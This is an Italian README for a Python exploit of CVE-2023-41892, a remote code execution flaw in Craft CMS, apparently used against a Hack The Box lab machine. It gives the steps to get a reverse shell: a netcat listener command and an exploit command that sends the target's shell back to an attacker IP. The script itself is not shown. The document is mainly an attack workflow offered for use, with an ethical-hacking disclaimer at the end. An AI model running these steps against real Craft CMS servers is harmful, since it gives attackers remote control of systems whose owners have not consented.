
CVE-2023-41892 Reverse Shell
Questo script Python sfrutta la vulnerabilità di Remote Code Execution (CVE-2023-41892) del Craft CMS, un popolare sistema di gestione dei contenuti. Le versioni tra 4.0.0-RC1 e 4.4.14 sono interessate da questa vulnerabilità che consente agli attaccanti di eseguire codice arbitrario da remoto, come una reverse shell PHP.
Per prima cosa avvia un listener netcat in un'altra shell:
nc -nlvp 1234
Poi controlla il tuo indirizzo IP ed esegui l'exploit:
python3 exploit.py -r 10.10.16.47 -p 1234 http://surveillance.htb
Buon hacking con la tua nuovissima reverse shell!
Questo codice è destinato esclusivamente a scopi di hacking etico e non deve essere utilizzato per attività dannose!
Grazie a to016 per il codice originale che può essere trovato in questo Gist